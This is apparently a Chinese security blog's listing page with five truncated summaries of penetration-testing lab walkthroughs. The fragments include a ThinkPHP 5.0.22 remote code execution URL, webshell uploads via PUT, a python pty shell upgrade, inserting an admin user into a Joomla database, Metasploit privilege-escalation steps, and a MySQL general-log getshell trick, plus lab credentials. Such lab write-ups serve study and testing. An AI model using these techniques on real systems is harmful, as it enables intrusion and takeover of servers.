摘要:
一、信息收集 cms扫描 端口扫描 目录扫描 输入错误路径,发现是5.0.22版本 查找poc 命令执行 插入木马 http://192.168.62.128?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0 阅读全文
摘要:
信息收集 2001端口 2002端口 抓包修改为PUT请求,上传木马,前面加/ python -c 'import pty; pty.spawn("/bin/bash")' 添加代理 个人原因 重置 kali IP地址改为 192.168.1.128 centos IP地址为192.168.1.13 阅读全文
摘要:
信息收集 testuser / cvcvgjASD!@ 爆破失败 登录数据成功 joomlaCMS公开漏洞 mysql -uroot -p123 -h 192.168.1.110 INSERT INTO `am2zu_users`(`name`, `username`, `password`, `p 阅读全文
摘要:
信息收集 失败了 换一个漏洞 木马上传 meterpreter > background msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_ex 阅读全文
摘要:
一、获取shell show variables like '%general%'; #查看日志状态 当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。SE 阅读全文